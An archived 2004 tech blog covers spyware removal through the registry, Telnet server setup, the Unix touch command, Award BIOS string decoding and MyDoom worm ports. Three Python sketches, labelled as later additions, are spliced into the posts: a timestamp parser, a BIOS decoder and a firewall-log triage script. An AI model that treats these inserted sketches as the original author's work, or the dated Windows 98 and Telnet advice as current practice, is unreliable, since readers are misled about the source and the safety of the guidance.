I finally resorted to the manual removal instructions at http://www.kephyr.com/spywarescanner/library/clearsearch.bho1/index.phtml . I rebooted the system and hit F8 as it rebooted to obtain the Microsoft Windows 98 Startup Menu. I then chose Safe Mode. I then took the following steps:

  1. Click on Start and select Run
  2. Type regedit and hit enter
  3. Look for the key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000240} and delete it, if found, by clicking on it to select it and then clicking on Edit followed by Delete. When you click on it, you will see "IEHooks Class" in the right pane under "Data".
  4. Delete the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00000000-0000-0000-0000-000000000240}, if it exists. You will see "Clear Search" under the "Data" column in the right-hand pane of the Registry Editor window when you select this key.
  5. Click on "Registry", then "Exit" to exit the registry editor.
  6. Delete the ClearSearch folder under the Program Files folder
  7. Restart the computer in normal mode
  8. Start Internet Explorer, click on Tools, Internet Options, Programs, and then click on the "Reset Web Settings" button. When asked if you want to reset your Web settings to their original Internet Explorer defaults, click on "Yes".

References:

  Alexa
    1. SimplytheBest Spyware Information

  ClearSearch
    1. PestPatrol
    2. Clearsearch Uninstall
    3. Symantec

  CometCursor
    1. and.doxdesk.com
    2. Kephyr

  Coulomb Dialer
    1. Kephyr

  FavoriteMan
    1. and.doxdesk.com

  HotBar
    1. 'Hotbar' spyware program bedevils Windows and should be removed
       By Al Fasoldt
       July 20, 2003
    2. and.doxdesk.com
    3. Kephyr

  VX2
    1. PC Sympathy
    2. PestPatrol

  Winpup32
    1. Kephyr

[/security/spyware] permanent link

Fri, Mar 26, 2004 6:27 pm

SCO Threatens Energy Department

Continuing its campaign of Fear, Uncertainty, and Doubt (FUD), hoping to cow Linux users into handing over large sums of money based on its unsubstantiated claims to own code used in the Linux operating system, the SCO Group is now demanding money from the US Energy Department.

SCO apparently adheres to the motto, "if you can't innovate, litigate." The company has seen the handwriting on the wall and knows its days are numbered, but apparently believes this last desperate ploy may put off its doom a few more years. They apparently hope that they can generate enough revenue from easily cowed companies, those that may have so much spare cash that they won't mind forking over a few thousand or even a few million "just in case", and perhaps even the federal government to keep the company running, since their revenue from their version of the Unix operating system is likely to continue to decline.

References:

    SCO threatens to sue Energy labs
    By Michael Hardy
    March 23, 2004

[/os/unix/sco] permanent link

Tue, Mar 23, 2004 5:25 pm

Longhorn

I saw an estimate today for the hardware requirements for Microsoft's next major operating system (OS) release, currently dubbed Longhorn. The author of the article said that some are speculating the new OS may require a 5 GHz processor and 2 Gigabytes (GB) of memory¹. I also read another article today that stated Intel has just released its Prescott chip, which may operate at speeds as fast as 5 GHz with twice the cache of the present Pentium 4 processors². Though another article I've read states that Prescott will come in speeds up to 3.4 GHz³, so 5 GHz processor speeds are probably at least a year away yet.

The Longhorn operating system is slated for release in 2006. Microsoft may release another operating system, Windows XP Reloaded, before Longhorn is released. Windows XP Reloaded may contain some of the security and multimedia features of Longhorn. Microsoft is expected to release Service Pack 2 for Windows XP and Service Pack 1 for Windows Server 2003 by the middle of 2004.

Some of Longhorn's new security features will likely require hardware upgrades, which is good news for hardware manufacturers. The OS will rely on a built-in security chip to supply some of the security functionality.

References:

  1. Desktop giant
    Next version of Windows expected to have big hardware needs
    By Florence Olsen
    March 22, 2004
  2. Intel quietly unleashes the power of Prescott
    By Oliver Rist
    March 19, 2004
  3. Prescott Brings More Cache to Intel's Future
    By Konstantinos Karagiannis
    February 4, 2004

[/os/windows/longhorn] permanent link

Mon, Mar 15, 2004 12:25 pm

NetSky Worm

According to the article "NetSky variants spark search for code" at ZDNet, the author of the NetSky worm may have released the source code to the worm.

References:

  1. NetSky variants spark search for code
  2. Second NetSky worm on the loose

[/security/worms] permanent link

Locking Computer

If you wish to lock your Windows NT, 2000, or XP system when you are going to leave it so that no one else can view what was on your screen when you left or use the system, you can hit the Ctrl, Alt, and Del keys simultaneously to do so. Hitting Ctrl-Alt-Del should bring up a window where you will see a button to "Lock Computer". However, if you are using a Windows XP system with Fast User Switching enabled, which is the default setting for a Windows XP system that is not part of a domain, hitting those three keys simultaneously will bring up the Windows Task Manager instead. But you can still lock the system by hitting the "Windows" and "L" keys simultaneously. The "Windows" key on most newer keyboards used on Windows systems will be located in the bottom row of the keyboard between the Ctrl and Alt keys on the left side of the keyboard. It will have Microsoft's flying Window symbol on it.

If you wish to disable Fast User Switching, see "How can I disable Fast User Switching in Windows XP Pro?"

[/os/windows] permanent link

Sun, Mar 14, 2004 9:29 pm

Updating a File's Timestamp with Touch

You can use the Unix touch command to modify a file's timestamp. The syntax is touch -t STAMP FILE, where the timestamp STAMP is in the form

[[CC]YY]MMDDhhmm[.ss]

CC - century, e.g. 19 for twentieth century or 20 for twenty-first century
YY - year
MM - month, use 01 for January
DD - day, use leading zeroes, e.g. 01 for the first day of the month
hh - hours in 24 hour format, e.g. 13 is 1:00 P.M.
mm - minutes
ss - seconds

Note: brackets denote optional parameters.

E.g. touch -t 200402132233 myfile.txt resets the timestamp on myfile.txt to February 13, 2004 10:33 P.M.
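The following Python sketch is an added example, not part of the original post. It parses the [[CC]YY]MMDDhhmm[.ss] format the way POSIX touch resolves the optional fields (a two-digit year of 69-99 means 19YY, 00-68 means 20YY, and a missing year means the current year) and applies the result to a file. The function names are hypothetical, seconds are limited to 00-59, and the last helper shows why a backdated modification time is still visible to an examiner: on Unix the inode change time is reset to the moment the timestamp was altered.

```python
import os
import re
import time
from datetime import datetime

# [[CC]YY]MMDDhhmm[.ss]; the regex backtracks so the 8, 10 and 12 digit forms all parse.
STAMP_RE = re.compile(
    r"(?:(?P<CC>\d{2})?(?P<YY>\d{2}))?(?P<MM>\d{2})(?P<DD>\d{2})"
    r"(?P<hh>\d{2})(?P<mm>\d{2})(?:\.(?P<ss>\d{2}))?"
)


def parse_touch_stamp(stamp, now=None):
    """Return the local-time datetime that `touch -t stamp` would apply."""
    m = STAMP_RE.fullmatch(stamp)
    if m is None:
        raise ValueError("not in [[CC]YY]MMDDhhmm[.ss] form: %r" % stamp)
    now = now or datetime.now()
    if m["YY"] is None:
        year = now.year                       # no year given: current year
    elif m["CC"] is None:
        yy = int(m["YY"])                     # POSIX: 69-99 -> 19YY, 00-68 -> 20YY
        year = (1900 if yy >= 69 else 2000) + yy
    else:
        year = int(m["CC"] + m["YY"])
    # datetime() rejects out-of-range fields (month 13, hour 25) with ValueError.
    return datetime(year, int(m["MM"]), int(m["DD"]),
                    int(m["hh"]), int(m["mm"]), int(m["ss"] or 0))


def set_file_times(path, stamp):
    """Set access and modification time as `touch -t` does; return the epoch value."""
    ts = time.mktime(parse_touch_stamp(stamp).timetuple())
    os.utime(path, (ts, ts))
    return ts


def mtime_predates_ctime(path):
    """True when the modification time is older than the inode change time.

    On Unix, setting the times explicitly still updates ctime to the current
    time, so a file whose timestamp was set back shows this mismatch.
    """
    st = os.stat(path)
    return st.st_mtime < st.st_ctime
```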

[/os/unix/commands] permanent link

Sun, Mar 14, 2004 8:44 pm

Configuring Telnet Server Service on Windows Small Business Server 2003

Starting the Telnet Service

  1. Click on Start
  2. Select Administrative Tools
  3. Select Services
  4. Scroll down until you find the Telnet service
  5. Double-click on Telnet
  6. Change the startup type to Automatic
  7. Click on Apply
  8. Double-click on Start
  9. Click on OK
  10. Close the Services window by selecting File then Exit

Configuring the Telnet Service for NT Authentication

Normally the telnet service will allow transmission of passwords in plaintext, i.e. in unencrypted format. Someone with a sniffer can learn the userid and password if unencrypted passwords are allowed. So ensure that only NT authentication is used, which will prevent plaintext passwords from being used to make the connection.

  1. Click on Start
  2. Select All Programs
  3. Select Accessories
  4. Select Command Prompt
  5. Type tlntadmn config sec=-passwd and hit the Enter key. You should see "The settings were successfully updated."
  6. You can check the settings by typing tlntadmn. For "authentication mechanism" you should see only NTLM.

Note: If you wish to see other options for the tlntadmn command, you can type tlntadmn /?

Specifying Telnet Clients

Under Windows Small Business Server 2003, you must also stipulate which userids are allowed to make Telnet connections to the server. To do so, take the steps below.

  1. Click on Start
  2. Select All Programs
  3. Select Administrative Tools
  4. Select Active Directory Users and Computers
  5. In the right pane, double-click on Telnet Clients
  6. Click on the Members tab
  7. Click on Add
  8. Under Enter the object names to select, put in the userids for which you wish to allow access
  9. You can click on Check Names to check the validity of names you have entered
  10. Click on OK when finished
  11. Click on OK again at the TelnetClients Properties window
  12. Click on File then Exit at the Active Directory Users and Computers window

References:

  1. Description of the Telnet Server Service Administration Tool

[/os/windows/server2003] permanent link

Sun, Feb 22, 2004 9:01 pm

Identifying a Motherboard from the Award BIOS String

When I turned on a fairly old PC, I received a memory test fail error as the system started the boot process. I opened the system to look for the motherboard model number, but couldn't find one, though I saw "Matsonic" stamped on the motherboard.

Since the system displayed the BIOS string at the bottom of the screen, I thought I should be able to identify the motherboard model from that string. The information displayed on the screen is shown below.

Award Modular BIOS v4.51PG, An Energy Star Ally
Copyright (C) 1984-97, Award Software, Inc.

Release 04/30/1998 S

PENTIUM-S CPU at 133MHz
Memory Test: 90112K OK

Award Plug and Play BIOS Extension v1.0A
Copyright (C) 1997, Award Software, Inc.
 Detecting HDD Primary Master None

Memory test fail


Press F1 to continue, DEL to enter SETUP
04/30/98-537+UMC8670F-2A5LDH09C-00

The BIOS string is in the last line. I know Award is the BIOS manufacturer, since I see "Award Plug and Play BIOS". The second to last group of dash separated characters, "2A5LDH09C" should hopefully identify the motherboard model. The interpretation of the BIOS string is as follows:

04/30/98-537+UMC8670F-2A5LDH09C-00

mm/dd/yy - the BIOS date in the form of month/date/year
For newer BIOS releases, you may see mm/dd/yyyy. In this case, the BIOS date is April 30, 1998.

The next group of characters after the first dash is usually used by the manufacturer for chipset and I/O name. In this case, I see "537+UMC8670F"

2A5LDH09C - the next group of dash separated characters can be interpreted as follows.

1st Character: BIOS Application
1 - BIOS before v4.2
2 - EliteBIOS v4.5x (commonly known as Award Modular BIOS 4.51PG)
3 - PowerBIOS v5.0 (Software on floppy disk)
4 - CardWare PCMCIA
5 - CAMPliant SCSI
6 - Medallion BIOS v6.00
7 - Socket services
8 - Card services
9 - OEM card manufacturing kit

2nd Character: Bus System / Topology
1 - ISA
2 - PS/2
3 - EISA Video
4 - Other
5 - EISA / ISA
6 - SCSI
7 - PCMCIA
8 - SCSI / CAM
9 - SCSI / CAMkit
A - ISA / PCI
B - EISA / PC
C - ISA / PM
D - EISA / PM
E - PCI / PnP

3rd Character: CPU Type
1 - 8086 / 8088
2 - 80286
3 - 80386
4 - 80486
5 - Pentium class
6 - Pentium II/III class OR Cyrix 386
7 - Cyrix 486
8 - 386SL
9 - 386SX
A - 42
B - 80C51SL
E - EGA
U - Universal
V - VGA

4th Character: Chipset Manufacturer
1 - ALD
3 - Cyrix
5 - ST Micro
6 - ATI Tech
9 - Intel
D - HiNT
G - VLSI
H - Contaq
I - SiS
J - Symphony [Winbond]
K - Acer Labs Inc ALi
L - VIA
O - EFAR
R - Forex
S - AMD
T - ACC Micro
U - OPTi
V - SARC
X - UMC

5th Character: Chipset Name
Only useful with chipset manufacturer (see complete listing)

6th Character¹: Flash Identifier (optional)
i - Intel 12V
s - SST 5V Flash ROM

7th and 8th Characters: Manufacturer Code
A0 ASUSTeK Computer Inc. (Formerly Aorta Systems)
A1 ABIT Computer Corp.
A2 A-Trend Technology Co., Ltd.
A3 Aquarius Systems, Inc. (ASI)
A5 AXIOM Technology Co., Ltd.
A7 AVT Industrial Ltd.
A8 Adcom
AB Aopen Inc.
AD Amaquest Computer Corp.
AK Advantech Co., Ltd.
AM ACHME
AT ASK Technology Ltd.
AX Achitec
B0 Biostar Microtech Corp.
B1 BEK-Tronic Technology
B2 Boser Technology Co., Ltd.
B3 BCM Advanced Research
BK Albatron Computer Corp.
C0 Chaintech Computer Co., Ltd.
C1 Clevo Co.
C2 Chicony Electronics Co., Ltd.
C3 Chaintech Computer Co., Ltd.
C5 Chaplet Systems Inc.
C9 CompuTrend Systems, Inc.
CF Flagpoint
CS CSS Laboratories
CV California Graphics USA Distribution
D0 DataExpert Corp.
D1 DTK Computer, Inc. (Advance Creative Computer)
D2 Digital Equipment Corp. (Purchased by Compaq)
D3 American Digicom Corp.
D4 Diamond Flower Electric Instrument Co.
D7 Daewoo Telecom
D8 Nature Worldwide Technology Corp.
DE Dual Technology Corp.
DI Domex Computer Services (DTC)
DJ Darter Technology Inc.
DL Delta Electronics, Inc.
E1 Elitegroup Computer Co., Ltd.
E3 EFA Corp.
E4 ESPCo (Elite Spirit Co., Ltd.)
E6 Elonex PLC
EC ENPC Technology Corp.
EO Evalue Technology Inc.
F0 First International Computer, Inc.
F1 Flytech Group International
F2 Flexus Computer Technology Inc.
F3 Full Yes Industrial Corp.
F5 FuguTech
F8 Formosa Industrial Computing, Inc.
F9 Ford Lian International Ltd.
FG Fastfame Technology Co., Ltd.
G0 Gigabyte Technology Co., Ltd.
G3 Gemlight Computer Ltd.
G5 GVC Corp.
G9 Global Circuit Technology
G9 C.P. Technology Co. Ltd.
GA Giantec Inc.
GE Globe Legate Co. Ltd
H0 PC Chips Manufacturing² (Hsing Tech)
H2 Shuttle Computer Group Inc. (Holco)
HH HighTech Information System
HJ Sono Computer Co., Ltd.
I3 Iwill Corp.
I4 Inventa
I5 Informtech International Ltd.
I7 Inlog Microsystem Co Ltd
I9 ICP
IC Inventec Corp.
IE Industrial Technology Research Institute
J1 Jetway Information Co. Ltd.
J1 J-Mark Computer Corp.
J2 Jamicon Electronics
J3 J-Bond
J4 Jetta International Inc.
J6 Joss Technology Ltd.
K0 Kapok Corp.
K1 Kaimei Corp.
KF KINPO Electronic
L1 Lucky Star Technology Co., Ltd.
L7 Lanner Electronics Inc.
L9 Lucky Tiger
LB Leadtek
M0 Matra
M2 MyComp
M3 Mitac
M4 Micro-Star International Co., Ltd.
M8 Mustek Corp.
M9 Micro Leader Enterprises
MH Macrotek
MP Maxtium Computer Corp.
N0 Nexcom
N5 NEC
NM NMC
NX Nexar
O0 Ocean Office Automation Ltd.
P1 PC Chips
P6 Protech
P8 AZZA Technology Inc.
P9 Powertech
PA EPoX Computer Co., Ltd.
PC Pine Technology
PF President (Formerly Wang Labs)
PK ALD Technology Ltd.
PN Procomp Informatics Ltd.
PR Super Grace Electronics Ltd.
PS Palmax
PX Pionix
Q0 Quanta
Q1 QDI (Quantum Designs Ltd.)
R0 Rise Computer Inc.
R2 Rectron
R3 Datavan International Corp.
R9 RSAP Technology
RA RioWorks Solutions Inc.
S2 Soyo Computer Inc.
S3 Smart D&M Technology Co., Ltd.
S5 Holco Enterprise Co., Ltd.
S9 Spring Circle Computer Inc.
SA Seanix
SC Sukjung (Auhua Electronics Co. Ltd.)
SE New Tech
SH Luckytech Technology Co. Ltd.
SJ Sowah (H.K.) Limited
SM Hope Vision, SuperPower, San Li
SN Soltek
SW S&D
SX Super Micro Computer, Inc.
T0 Twinhead
T4 Taken
T5 Tyan Computer Corp.
T6 Trigem
TB Taeli (Techmedia)
TG Tekram
TJ Totem Technology Co., Ltd.
TL Transcend Information, Inc.
TP Taiwan Commate Computer Inc.
TR Top Star
TW T&W Electronics (CZ) Co., Ltd.
TX Tsann Kuen Enterprise Co., Ltd. (EUPA Computer)
TY Aeton Technology Inc.
U0 U-Board
U1 Universal Scientific Industrial
U2 UHC Advanced Integration Research
U3 Umax
U4 Unicorn Computer Corp.
U6 Unitron
U9 Warp Speed Ink.
V3 VTech (PC Partner Ltd.)
V5 Vision Top
V6 Vobis
V7 YKM (Dayton Micron)
W0 WinTechnologies (Edom)
W1 Well Join Industry Co., Ltd.
W5 Winco Electronics
W7 Win Lan Enterprise
W9 Weal Union Development Ltd.
XA ADLink Technology Inc.
X3 ACORP International
X5 Arima Computer Corp.
Y2 Yamashita Engineering Manuf., Inc.
Z1 Zida Technologies Ltd.
Z3 ShenZhen Zeling Industrial Co., Ltd.

9th and 10th Characters: Model ID
Manufacturer specific

¹ This character may not be present. If you don't see an "i" or "s" in the 6th position, then the next two characters represent the manufacturer code.
² PC Chips is just an OEM distributor for Hsing Tech.

The last group of digits, which in the case of the string "04/30/98-537+UMC8670F-2A5LDH09C-00" is "00", specifies the BIOS version, with "00" representing the initial release.

If I look up the chipset code 2A5LD, I see it corresponds to the VIA Apollo VPX (VXPro+) chipset. And I do see a Via chip next to the Award BIOS chip on the motherboard. The H0 after 2A5LD identifies the motherboard manufacturer as PC Chips, a distributor for Hsing Tech. At the Plasma Online website, I see that the Matsonic MS-5120 motherboard uses a VXPro+ chipset and is identical to the PC Chips M537DMA33 motherboard, so now I may be able to find a manual at the website for one of those companies which will tell me the maximum amount of memory the motherboard will support.
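The decoding walked through above can be automated. The Python sketch below is an added example, not part of the original post: it splits an Award BIOS string into the fields from the table and handles the optional 6th character. The lookup dictionaries are only subsets of the table, the function name is hypothetical, and treating the flash identifier as a lowercase-only "i" or "s" is an assumption based on how the table prints it.

```python
from datetime import datetime

# Subsets of the lookup tables on this page; codes not listed come back as "unknown".
BIOS_APP = {"1": "BIOS before v4.2", "2": "EliteBIOS v4.5x", "3": "PowerBIOS v5.0",
            "6": "Medallion BIOS v6.00"}
BUS = {"1": "ISA", "2": "PS/2", "5": "EISA / ISA", "A": "ISA / PCI", "E": "PCI / PnP"}
CPU = {"3": "80386", "4": "80486", "5": "Pentium class",
       "6": "Pentium II/III class OR Cyrix 386"}
CHIPSET_VENDOR = {"9": "Intel", "I": "SiS", "K": "Acer Labs Inc ALi", "L": "VIA",
                  "S": "AMD", "U": "OPTi", "X": "UMC"}
FLASH = {"i": "Intel 12V", "s": "SST 5V Flash ROM"}
BOARD_VENDOR = {"A0": "ASUSTeK Computer Inc.", "A1": "ABIT Computer Corp.",
                "G0": "Gigabyte Technology Co., Ltd.",
                "H0": "PC Chips Manufacturing (Hsing Tech)",
                "M4": "Micro-Star International Co., Ltd."}


def lookup(table, code):
    return table.get(code, "unknown (%s)" % code)


def decode_award_bios_string(bios_string):
    """Split an Award BIOS string into the fields described in the table above."""
    parts = bios_string.strip().split("-")
    if len(parts) < 4:
        raise ValueError("expected date-chipset/IO-ID-version: %r" % bios_string)
    date_text, ident, version = parts[0], parts[-2], parts[-1]
    # Older releases print mm/dd/yy, newer ones mm/dd/yyyy.
    fmt = "%m/%d/%Y" if len(date_text) == 10 else "%m/%d/%y"
    bios_date = datetime.strptime(date_text, fmt).date()
    if len(ident) < 7:
        raise ValueError("ID group too short: %r" % ident)
    # The 6th character is optional: a lowercase i or s is the flash identifier
    # (assumed case-sensitive, since manufacturer codes use capitals); otherwise
    # the two-character manufacturer code starts in that position.
    if ident[5] in FLASH:
        flash, rest = FLASH[ident[5]], ident[6:]
    else:
        flash, rest = None, ident[5:]
    if len(rest) < 2:
        raise ValueError("manufacturer code missing: %r" % ident)
    return {
        "bios_date": bios_date,
        "chipset_io": "-".join(parts[1:-2]),   # rejoined in case it holds a dash
        "bios_application": lookup(BIOS_APP, ident[0]),
        "bus": lookup(BUS, ident[1]),
        "cpu_type": lookup(CPU, ident[2]),
        "chipset_vendor": lookup(CHIPSET_VENDOR, ident[3]),
        "chipset_code": ident[:5],             # looked up in a separate chipset list
        "flash": flash,
        "board_vendor": lookup(BOARD_VENDOR, rest[:2]),
        "model_id": rest[2:],
        "version": version,
    }


if __name__ == "__main__":
    for key, value in decode_award_bios_string(
            "04/30/98-537+UMC8670F-2A5LDH09C-00").items():
        print("%-17s %s" % (key, value))
```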

I went to the Matsonic website first. This company does a poor job of technical support. Not only didn't they put the model number on the motherboard, they don't provide any on-line manuals and I couldn't find any information at all on the site for the MS-5120 motherboard.

So I then went to the USA website for PC Chips at http://www.pcchipsusa.com. Fortunately, this company provides a manual for the M537D motherboard at http://www.pcchipsusa.com/support-discontinued-manuals.asp. However, that manual doesn't match my motherboard, since the USB connector on my motherboard isn't between the ISA and PCI slots as depicted in the manual, nor do the Via chip numbers shown in the manual match the numbers on the ones on my motherboard.

Fortunately, a Google search did provide a link to a site with Matsonic manuals. The manual for the MS-5120 motherboard indicates it can handle a maximum of 384 MB of memory. The manual states SIMM 3,4 and DIMM1 cannot be used at the same time.

References:

  1. IC Book
  2. ID HW

[/pc/hardware/motherboard] permanent link

Sat, Feb 14, 2004 9:00 am

AT Power Supply

Newer PCs will have an ATX power supply, while older ones may have an AT power supply. The AT power supply will have two sets of cables extending from it. When you connect the cables to the motherboard, the black wires from each set should go next to one another at the motherboard connector. The pinout for an AT power supply is shown below.

[Figure: AT power supply connector pins]

[/pc/hardware/power-supply] permanent link

Fri, Feb 13, 2004 10:33 pm

MyDoom

The Internet Storm Center is listing the following as the top ten attacked ports today:

Top Attacked Ports
mydoom 3127
epmap 135
ms-sql-m 1434
netbios-ns 137
www 80
SubSeven 27374
microsoft-ds 445
socks 1080
squid-http 3128
amanda 10080

Several of these ports are associated with the MyDoom worm. When a system is infected by the MyDoom.A variant of the worm, the worm opens TCP ports 3127 through 3198, which explains why both of those ports are listed in the top ten attacked ports for today. A later variant of the worm, MyDoom.B, may use TCP ports 80, 1080, 3128, 8080 and 10080, which may be why all of those ports except 8080 appear in the top ten list for today, though I would expect port 80 attacks to be high even without this worm, since port 80 is the port most commonly used by web servers.

Ports 1080 and 10080, like port 80, have additional uses other than providing a mechanism for the MyDoom worm to provide a backdoor into systems. Port 1080 is used for the socks protocol. Socks is an Internet Engineering Task Force (IETF) standard proxy protocol for IP applications. The Advanced Maryland Automatic Network Disk Archiver (AMANDA) uses UDP port 10080, but not TCP port 10080. Amanda is a backup system that allows the administrator of a LAN to set up a single master backup server to back up multiple hosts to a single large capacity tape drive.
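The port overlaps described above matter when reading firewall logs. The Python sketch below is an added example, not part of the original post: it sorts destination ports from a constructed firewall log into MyDoom-only ports and ports that are shared with an ordinary service. The log format, addresses and function names are assumptions made for illustration, and the http-alt label for TCP 8080 comes from the IANA registry rather than from this page.

```python
import re
from collections import defaultdict

MYDOOM_A_TCP = range(3127, 3199)               # MyDoom.A: TCP 3127 through 3198
MYDOOM_B_TCP = {80, 1080, 3128, 8080, 10080}   # ports MyDoom.B may use
# Ordinary services on the same port numbers. Amanda is UDP only, so a TCP
# connection to 10080 is not backup traffic.
LEGIT = {("TCP", 80): "www", ("TCP", 1080): "socks", ("TCP", 3128): "squid-http",
         ("TCP", 8080): "http-alt", ("UDP", 10080): "amanda"}

# Constructed log format: timestamp action proto src:sport -> dst:dport
LINE_RE = re.compile(r"^(\S+) (\w+) (TCP|UDP) ([\d.]+):(\d+) -> ([\d.]+):(\d+)$")

SAMPLE_LOG = [  # constructed sample, documentation address ranges
    "2004-02-13T22:30:01 DROP TCP 203.0.113.5:4021 -> 192.0.2.10:3127",
    "2004-02-13T22:30:02 DROP TCP 203.0.113.5:4022 -> 192.0.2.10:3128",
    "2004-02-13T22:30:04 DROP TCP 203.0.113.5:4023 -> 192.0.2.10:3150",
    "2004-02-13T22:31:10 ACCEPT TCP 198.51.100.7:51000 -> 192.0.2.10:80",
    "2004-02-13T22:31:15 ACCEPT UDP 198.51.100.9:10080 -> 192.0.2.11:10080",
    "2004-02-13T22:32:00 DROP TCP 198.51.100.20:2200 -> 192.0.2.10:10080",
    "2004-02-13T22:32:05 DROP TCP 198.51.100.20:2201 -> 192.0.2.10:445",
]


def classify(proto, port):
    """Return (MyDoom variants using this port, ordinary service name or None)."""
    variants = []
    if proto == "TCP":
        if port in MYDOOM_A_TCP:
            variants.append("MyDoom.A")
        if port in MYDOOM_B_TCP:
            variants.append("MyDoom.B")
    return variants, LEGIT.get((proto, port))


def triage(log_lines):
    """Group MyDoom-related destination ports by source address.

    'strong' ports have no ordinary service in LEGIT; 'ambiguous' ports are
    shared with one and need more context before drawing a conclusion.
    """
    report = defaultdict(lambda: {"strong": set(), "ambiguous": set()})
    for line in log_lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue                       # skip lines in another format
        proto, src, dport = m.group(3), m.group(4), int(m.group(7))
        variants, legit = classify(proto, dport)
        if variants:
            report[src]["ambiguous" if legit else "strong"].add(dport)
    return dict(report)
```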

[/security] permanent link
